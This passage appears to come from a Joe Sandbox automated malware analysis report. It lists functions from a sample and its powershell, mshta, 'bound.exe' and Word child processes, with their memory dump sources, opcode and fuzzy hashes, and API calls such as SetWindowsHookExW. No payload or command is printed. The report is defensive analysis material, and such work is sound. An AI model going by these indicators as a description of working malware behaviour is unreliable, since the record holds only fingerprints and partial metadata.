Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: 4f5d94246872f2193e537bc66f33c90add5f7e97f4787e66017fcfb3b1ebd6d4
Instruction ID: d46a9655ffac21e5b482143abb3de813be5387ae12781428e541197a31f20343
Opcode Fuzzy Hash: 4f5d94246872f2193e537bc66f33c90add5f7e97f4787e66017fcfb3b1ebd6d4
Instruction Fuzzy Hash: FC418F22A1CA8189EB60BF25E4853AA67A1FBA8794F444135EE4DC7B9CEF3CD445C740

Function 00007FFDFF198000 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68timeCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32 ref: 00007FFDFF19804D
SystemTimeToFileTime.KERNEL32 ref: 00007FFDFF19805D

Strings

gfff, xrefs: 00007FFDFF19808F

Memory Dump Source

Source File: 00000001.00000002.2198558047.00007FFDFF191000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFF190000, based on PE: true

Associated: 00000001.00000002.2198504238.00007FFDFF190000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2198558047.00007FFDFF212000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2198558047.00007FFDFF214000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2198558047.00007FFDFF23C000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2198558047.00007FFDFF247000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2198558047.00007FFDFF252000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2198911802.00007FFDFF256000.00000080.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2198959360.00007FFDFF258000.00000004.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdff190000_sB2ClgrGng.jbxd

Similarity

API ID: Time$System$File
String ID: gfff
API String ID: 2838179519-1553575800
Opcode ID: c968c355feb94c5b440177db6edb28bb9214d3af88eb205657e6bed885a85f80
Instruction ID: 258fbe8b90f5be8a9692458530bd0e0267cfbd81c00f4d787cace86a719ca339
Opcode Fuzzy Hash: c968c355feb94c5b440177db6edb28bb9214d3af88eb205657e6bed885a85f80
Instruction Fuzzy Hash: 1521D172B0464685EBA48F29D420B7977E4E788B98F888135DA6DC77D9EF3DE1408740

Function 00007FF64488F5B8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32 ref: 00007FF64488F5F8
GetCurrentDirectoryW.KERNEL32 ref: 00007FF64488F64A

Strings

:, xrefs: 00007FF64488F60E

Memory Dump Source

Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: CurrentDirectory
String ID: :
API String ID: 1611563598-336475711
Opcode ID: e8d367c4ea258391d160676196091cc4497c978f166048fd005a5cb1bdaac227
Instruction ID: 325a810fdf6a7a7077d78a166e7dfaffa565f521c16f16e5947c9281b6c7cdb3
Opcode Fuzzy Hash: e8d367c4ea258391d160676196091cc4497c978f166048fd005a5cb1bdaac227
Instruction Fuzzy Hash: 6321D262A1C68189EB20FB11D48627D73A1FB88B44F464235DF8D83699DF7DE944CB41

Function 00007FF64487FD48 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

RtlPcToFileHeader.KERNEL32 ref: 00007FF64487FD98
RaiseException.KERNEL32 ref: 00007FF64487FDD9

Strings

csm, xrefs: 00007FF64487FDC6

Memory Dump Source

Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: b596af9f6a60738c50b353da5cbad86497326ffe12a5eabfdc94c01c9dae4a3e
Instruction ID: 187bd0a083416dd84e950d13af2fdb7fcfc2929a143ad516ae7646986dbf66de
Opcode Fuzzy Hash: b596af9f6a60738c50b353da5cbad86497326ffe12a5eabfdc94c01c9dae4a3e
Instruction Fuzzy Hash: 03112E3261CB8186EB61AF16E8902597BE4FB88B88F588230DF8D47759DF3DD551C700

Function 00007FF64489073C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF64489076C
GetDriveTypeW.KERNEL32 ref: 00007FF6448907AC

Strings

:, xrefs: 00007FF644890795

Memory Dump Source

Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: DriveType_invalid_parameter_noinfo
String ID: :
API String ID: 2595371189-336475711
Opcode ID: 68237dfdc7112287ec82a3b365f776b5c9f6f856de5878160eaa1a8f91e0357f
Instruction ID: 3b94e68c8aa6fbeaffad1e9f2bcddb0b45d18847c0216af44ff3b419a800d7e8
Opcode Fuzzy Hash: 68237dfdc7112287ec82a3b365f776b5c9f6f856de5878160eaa1a8f91e0357f
Instruction Fuzzy Hash: 97014F62A1CA02DEF720BF6094A727E63A0FF89754F840435DD4DC669AEF2EE5049B14

Analysis Process: powershell.exePID: 7224, Parent PID: 5544COMMON

Executed Functions

Function 00007FFD9A9967F5 Relevance: .4, Instructions: 443COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2064711335.00007FFD9A990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffd9a990000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61af3d83ce049be550c0ea5407a0048517f81c3f788dab3a5cc4f1cca7d61397
Instruction ID: 70a174ca4da6dc789c10c5f0792f97784a0dc6765bc26bf27b019be57350c7d1
Opcode Fuzzy Hash: 61af3d83ce049be550c0ea5407a0048517f81c3f788dab3a5cc4f1cca7d61397
Instruction Fuzzy Hash: FAD15A23B0EAC92FEB69DB6848745B57B90FF96390B5801FED19DCB0D3DA19A805C341

Function 00007FFD9A8CBBF3 Relevance: .3, Instructions: 306COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2063423190.00007FFD9A8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A8C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffd9a8c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aebde3f1232c2e38175831c80282f39692075820da9eb93581435806e0bc85ef
Instruction ID: c08a903dbfdfa32ea3a583266216acb7419cda8ae0a7934b74d86f56ba87086e
Opcode Fuzzy Hash: aebde3f1232c2e38175831c80282f39692075820da9eb93581435806e0bc85ef
Instruction Fuzzy Hash: 72A1D563A0EBD18FE726ABAC58791E57FA0DF52224B0D41FBD0D88B0E3DD096805C752

Function 00007FFD9A8C9880 Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2063423190.00007FFD9A8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A8C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffd9a8c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a599c45c0d07a9e2491abeb985d28a6ea11068098e8857a7b4bf3b740e44008e
Instruction ID: cb70700be8e94a78391727a69e271fb72df3b08913955f89675ed2442e5d11bc
Opcode Fuzzy Hash: a599c45c0d07a9e2491abeb985d28a6ea11068098e8857a7b4bf3b740e44008e
Instruction Fuzzy Hash: 6231F471A1CB884FDB5C9B5C9C066A9BBF0FB99310F00426FE449D3292DA70B855CBC2

Function 00007FFD9A7AE383 Relevance: .1, Instructions: 123COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2061842955.00007FFD9A7AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A7AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffd9a7ad000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a4e0e975eccdc069d2a3cebe4473cfe4f90db36a678e75fe799ea2c34c82775
Instruction ID: 84dc8cfde7aea7eb265373e5188c5f7fa236fd866385f3bfd3be2620aa3b99bd
Opcode Fuzzy Hash: 3a4e0e975eccdc069d2a3cebe4473cfe4f90db36a678e75fe799ea2c34c82775
Instruction Fuzzy Hash: D2413B7150DBC45FE75A8F3898569523FF0EF52324B1905EFD088CB1A3D625E84AC792

Function 00007FFD9A8C33B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2063423190.00007FFD9A8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A8C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffd9a8c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42f32a37e772bc675462bcf5eaa5a2b152438d1bfc6ca3e4267f2be6b1a4fcf4
Instruction ID: 948701ba5133e8c3ee23e9a359f4e56e9108d52c09b8e742dc8b756b572a7628
Opcode Fuzzy Hash: 42f32a37e772bc675462bcf5eaa5a2b152438d1bfc6ca3e4267f2be6b1a4fcf4
Instruction Fuzzy Hash: 6C01A73120CB0C4FD748EF0CE451AA6B3E0FB85324F10056EE58AC3695DA36E882CB42

Function 00007FFD9A8CA1FB Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2063423190.00007FFD9A8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A8C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffd9a8c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1aac34ece969982ed16a71f1b653ed99bb7e92dc7640772b1bf24d94921ed5a
Instruction ID: 58891f56a1350a1c947f3b84e9c78ff1982a4bf9b39568283f626d1eb2dc835c
Opcode Fuzzy Hash: c1aac34ece969982ed16a71f1b653ed99bb7e92dc7640772b1bf24d94921ed5a
Instruction Fuzzy Hash: 1AF0B43661868C8FC706AF6C98284EA7BA0EF65205B0902BBD49DCB562DB255919CBC1

Function 00007FFD9A99432D Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2064711335.00007FFD9A990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffd9a990000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e5b7d85068cd6226895dfb692a799b588ab2d4e48dfb24c1aaaf34d821c523e8
Instruction ID: 0641d44628f7a897960b19beb32d574d80ee9225b6b7d30d46757ae2aa4093a9
Opcode Fuzzy Hash: e5b7d85068cd6226895dfb692a799b588ab2d4e48dfb24c1aaaf34d821c523e8
Instruction Fuzzy Hash: 02F09A32B0D5068FD76DEA6CA4569A873E0FF8532075100FAE05DC75A7CA25EC41C740

Function 00007FFD9A9945E0 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2064711335.00007FFD9A990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffd9a990000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1069cc75ac1f0c6f75b14e4aa6e69229b0f394913d874eb908a2ff878e4363ca
Instruction ID: f0ce31baf6a1cc270d47dae2d3a24c38875209aa843a5fff58f2ebbb76eccd86
Opcode Fuzzy Hash: 1069cc75ac1f0c6f75b14e4aa6e69229b0f394913d874eb908a2ff878e4363ca
Instruction Fuzzy Hash: D0F0B832B0D5449FEB69EB9CE4619A873E0FF89320B4000F6E01DCB5A7CA26AC80C740

Non-executed Functions

Function 00007FFD9A8C86FA Relevance: 7.6, Strings: 6, Instructions: 88COMMON

Download Yara Rule

Strings

N_^, xrefs: 00007FFD9A8C8712
N_^, xrefs: 00007FFD9A8C87B2
N_^, xrefs: 00007FFD9A8C8772
N_^, xrefs: 00007FFD9A8C86FA
N_^, xrefs: 00007FFD9A8C8722
N_^, xrefs: 00007FFD9A8C87C2

Memory Dump Source

Source File: 0000000D.00000002.2063423190.00007FFD9A8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A8C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffd9a8c0000_powershell.jbxd

Similarity

API ID:
String ID: N_^$N_^$N_^$N_^$N_^$N_^
API String ID: 0-4064032852
Opcode ID: 87a179755f63a0fc5084f4fef7484bd987066439d702b26840e9ed8b23ab195b
Instruction ID: 959f859aa4a4bfa4cf17ef0478b9524fb24aa3546e977afea7dc189dafca0915
Opcode Fuzzy Hash: 87a179755f63a0fc5084f4fef7484bd987066439d702b26840e9ed8b23ab195b
Instruction Fuzzy Hash: D4318493E0E6D54FE76A5B685C790D53FE0AF22218B0A01F7D5E84F193FD1928078742

Function 00007FFD9A8C897C Relevance: 6.4, Strings: 5, Instructions: 135COMMON

Download Yara Rule

Strings

N_^, xrefs: 00007FFD9A8C8AC2
N_^, xrefs: 00007FFD9A8C89C9
N_^, xrefs: 00007FFD9A8C8A2A
N_^, xrefs: 00007FFD9A8C8A7A
N_^, xrefs: 00007FFD9A8C8AE2

Memory Dump Source

Source File: 0000000D.00000002.2063423190.00007FFD9A8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A8C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffd9a8c0000_powershell.jbxd

Similarity

API ID:
String ID: N_^$N_^$N_^$N_^$N_^
API String ID: 0-2528851458
Opcode ID: 60b1253c909a0a8dc9e960e87a586ac04e2ab4ef66be134939296bc154318b40
Instruction ID: e8988e95ec0859357e6ceba0402367d935bf902d2598f6ae7c506f3a6ab738d2
Opcode Fuzzy Hash: 60b1253c909a0a8dc9e960e87a586ac04e2ab4ef66be134939296bc154318b40
Instruction Fuzzy Hash: ED4190A3B4E6C24FE72A57694C791957FA0EF62718F0A01F7C0D48F0A3E919284B8753

Function 00007FFD9A8C8BFA Relevance: 6.4, Strings: 5, Instructions: 108COMMON

Download Yara Rule

Strings

N_^F, xrefs: 00007FFD9A8C8C6A
N_^6, xrefs: 00007FFD9A8C8BFA
N_^J, xrefs: 00007FFD9A8C8C7A
N_^<, xrefs: 00007FFD9A8C8C2A
N_^I, xrefs: 00007FFD9A8C8C72

Memory Dump Source

Source File: 0000000D.00000002.2063423190.00007FFD9A8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A8C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffd9a8c0000_powershell.jbxd

Similarity

API ID:
String ID: N_^6$N_^<$N_^F$N_^I$N_^J
API String ID: 0-4116931533
Opcode ID: 8201c494a57edf1f917aa58f11816ee0842afcba423ac7bfc73ad6212f0e6841
Instruction ID: 694e1381db686feef63ee40d02a6bf66d9ce44f006b9f467a38141a6caa5fe79
Opcode Fuzzy Hash: 8201c494a57edf1f917aa58f11816ee0842afcba423ac7bfc73ad6212f0e6841
Instruction Fuzzy Hash: 5C21EFA7B084265E9302BBADBC209D86780DBD427A74801B3D368CB547DE14609B8682

Function 00007FFD9A8C862B Relevance: 5.1, Strings: 4, Instructions: 60COMMON

Download Yara Rule

Strings

N_^, xrefs: 00007FFD9A8C866A
N_^, xrefs: 00007FFD9A8C867A
N_^, xrefs: 00007FFD9A8C863A
N_^, xrefs: 00007FFD9A8C865A

Memory Dump Source

Source File: 0000000D.00000002.2063423190.00007FFD9A8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A8C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffd9a8c0000_powershell.jbxd

Similarity

API ID:
String ID: N_^$N_^$N_^$N_^
API String ID: 0-3900292545
Opcode ID: 4bae1b5e683b3a31117f6884b2a779f4d3129ebeef79c931eafcb091b11e9a4a
Instruction ID: ca977aa7d7df7a1c4f4d4d72252bebfa43cc1756d7cf833496a3387e48fd8505
Opcode Fuzzy Hash: 4bae1b5e683b3a31117f6884b2a779f4d3129ebeef79c931eafcb091b11e9a4a
Instruction Fuzzy Hash: 1B116093E0E6D24BE7171778187D4D57FA09FA3328B5E02FBD0E90B0A3E90528079766

Analysis Process: mshta.exePID: 7272, Parent PID: 6980COMMON

Executed Functions

Function 00000174F1A80FC1 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000003.1843614431.00000174F1A80000.00000010.00000800.00020000.00000000.sdmp, Offset: 00000174F1A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_3_174f1a80000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
Instruction ID: 66e17030273b0506e9fbdb186ba4f9b3d945fe31bfc9bce09fa95e5b98f72a39
Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
Instruction Fuzzy Hash: 5E90021489A40656D51411950D4529C54506789260FD48480881A90184D54E06A65152

Analysis Process: bound.exePID: 7280, Parent PID: 1228COMMON

Execution Graph

Execution Coverage:	22.1%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	9
Total number of Limit Nodes:	0

Executed Functions

Function 00007FFD9A8D262F Relevance: 1.8, APIs: 1, Instructions: 255
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000F.00000002.4239154337.00007FFD9A8D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A8D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd9a8d0000_bound.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2874ee869282b5af1d6991e38a5e610d0f6ae2360e798b59f1e472235d0588d
Instruction ID: 738874f83900dbbc075c85720e488883aeb65fed14187d21dcc56318e3693f8e
Opcode Fuzzy Hash: c2874ee869282b5af1d6991e38a5e610d0f6ae2360e798b59f1e472235d0588d
Instruction Fuzzy Hash: 1D611372B0CA694BDB14EFACEC55AE97BA0EF94336B04027BD159C3183DE64A40687D1

Function 00007FFD9A8D2728 Relevance: 1.7, APIs: 1, Instructions: 174
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000F.00000002.4239154337.00007FFD9A8D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A8D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd9a8d0000_bound.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed05240d489f33a01d87aa13e88a0c04789c0a8a4374170d1d208d89d25c0789
Instruction ID: cfc4d8979dcb0050e956aa75e2e92c76eb47b5abc797b45949bf4ffc63196df3
Opcode Fuzzy Hash: ed05240d489f33a01d87aa13e88a0c04789c0a8a4374170d1d208d89d25c0789
Instruction Fuzzy Hash: 9A514D72E0DA894FDB69DFA898666F97BE0EF55320F0402BED05DC3193DE246806C781

Function 00007FFD9A8D2C38 Relevance: 1.6, APIs: 1, Instructions: 135
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowsHookExW.USER32 ref: 00007FFD9A8D2D01

Memory Dump Source

Source File: 0000000F.00000002.4239154337.00007FFD9A8D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A8D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd9a8d0000_bound.jbxd

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: b6fa8b2841614623324bf2215eaa594672649bf3816dcfc85eea5374d47720aa
Instruction ID: a290a1d32536617b8542e0a967c0a94e5a59fc73cb2f89e9b79b85b4cd522ce2
Opcode Fuzzy Hash: b6fa8b2841614623324bf2215eaa594672649bf3816dcfc85eea5374d47720aa
Instruction Fuzzy Hash: C9310631A1CA4D8FDB58DF689816AF97BE1EB99321F00427ED01DD3296DE64A8028781

Function 00007FFD9A8D2708 Relevance: 1.6, APIs: 1, Instructions: 131
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowsHookExW.USER32 ref: 00007FFD9A8D2D01

Memory Dump Source

Source File: 0000000F.00000002.4239154337.00007FFD9A8D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A8D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd9a8d0000_bound.jbxd

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: 6deb19496c57eff68510091561f5f6704647658f77ad215a3ce670633516d81a
Instruction ID: 6884cc26c3e58af9ccd5db9fc7c7267828e2663db34ca9bfd25b33c5e62ba094
Opcode Fuzzy Hash: 6deb19496c57eff68510091561f5f6704647658f77ad215a3ce670633516d81a
Instruction Fuzzy Hash: D6312831A0CA4C4FEB58EF6C98566F97BE1EB99321F10427ED05DD3292DE65A802C7C1

Analysis Process: word.exePID: 8364, Parent PID: 1044COMMON

Executed Functions

Function 00007FFD9A8B12E9 Relevance: .8, Instructions: 797COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002F.00000002.1973572634.00007FFD9A8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_7ffd9a8b0000_word.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 43a45fdde9497d787e077bcbfc8fd67fb2eb26ff6de22bc21de0f2a63e1c7e60
Instruction ID: 81ab5df9b6371111785e21f5c55faaa900a36d93122b70cae943cba0e4c6e127
Opcode Fuzzy Hash: 43a45fdde9497d787e077bcbfc8fd67fb2eb26ff6de22bc21de0f2a63e1c7e60
Instruction Fuzzy Hash: 2F42BA61B28A494FE798FB7C8875AB977E2FF98304F540579E44DC32DADE286C018781

Function 00007FFD9A8B0C5E Relevance: .2, Instructions: 177COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002F.00000002.1973572634.00007FFD9A8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_7ffd9a8b0000_word.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c0c6e77741f319c84cd26efa2ac353d5a655f08e4789b758a78aedcba17f272
Instruction ID: 4f11b148534b72df2ba1484ca4c3859f5858a07b8c802a1fe66dce623fbd304d
Opcode Fuzzy Hash: 8c0c6e77741f319c84cd26efa2ac353d5a655f08e4789b758a78aedcba17f272
Instruction Fuzzy Hash: E051E521B1DAC60FE75AA77848656B53FE2DF86220B0901FBD48DC71EBDD1C6C468352

Function 00007FFD9A8B1125 Relevance: .2, Instructions: 158COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002F.00000002.1973572634.00007FFD9A8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_7ffd9a8b0000_word.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b3044853c62e5c6f3f29e62d73c184eab7c30b3424b8fa8964f5bc9807ca6e0
Instruction ID: 40333c9e632b887093884a524afdd24d69f0d3a677239f1f430917ba41620454
Opcode Fuzzy Hash: 2b3044853c62e5c6f3f29e62d73c184eab7c30b3424b8fa8964f5bc9807ca6e0
Instruction Fuzzy Hash: 4941E662E0D64A4FE745EFB89CB14EE7B70EF85224B4401B7D099DB0E7DE2828468391

Function 00007FFD9A8B1190 Relevance: .1, Instructions: 119COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002F.00000002.1973572634.00007FFD9A8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_7ffd9a8b0000_word.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc94b2d4e5114e5d635ca4324572de803d9b0803944eccef7338607de95c686c
Instruction ID: c0c09aa00417a10e71b427a9e9c4373466d9bcb90ef83a41758a0d4a80172242
Opcode Fuzzy Hash: bc94b2d4e5114e5d635ca4324572de803d9b0803944eccef7338607de95c686c
Instruction Fuzzy Hash: BF31F862E0864A4FEB95EFA88C711EDBBB1EF89210F4401B7D059EB1E7DE3428058780

Function 00007FFD9A8B09A9 Relevance: .1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002F.00000002.1973572634.00007FFD9A8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_7ffd9a8b0000_word.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af082cd7ef67f1656b70673c13f57facf0fe354bd3ecbe2961b149582dd3d7b6
Instruction ID: 70c29fb8d41b6dd926bda56586882b34af37600ea8f06e9b8debd4e1eb704e2c
Opcode Fuzzy Hash: af082cd7ef67f1656b70673c13f57facf0fe354bd3ecbe2961b149582dd3d7b6
Instruction Fuzzy Hash: B0418171E18A098FDB48EFA88C756ADB7B2FF98314F500579D019D72CBDE38A8058751

Function 00007FFD9A8B1D65 Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002F.00000002.1973572634.00007FFD9A8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_7ffd9a8b0000_word.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2e2d0135a7cb9cfdc700f23b3b2953d565e900a76b20d5e0169a43cdfff761a
Instruction ID: 4f94ccee4ad860a18b6f8623ad2aab39318923019256de60fce5e2875343eef9
Opcode Fuzzy Hash: a2e2d0135a7cb9cfdc700f23b3b2953d565e900a76b20d5e0169a43cdfff761a
Instruction Fuzzy Hash: D0319A21B1C9484FD788EB2C98657B8B6C2EF9C315F4405BEE04EC32DBDD68AC418741

Function 00007FFD9A8B0855 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002F.00000002.1973572634.00007FFD9A8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_7ffd9a8b0000_word.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 226030a18aab20197bcb3c41fac6f8c3b53c1ed98d607c228142d72ba2b2ea31
Instruction ID: 01ab33f1cc4e46dd7ef7508b7a886b0084dacdced28d75a2a3cf1393667432e3
Opcode Fuzzy Hash: 226030a18aab20197bcb3c41fac6f8c3b53c1ed98d607c228142d72ba2b2ea31
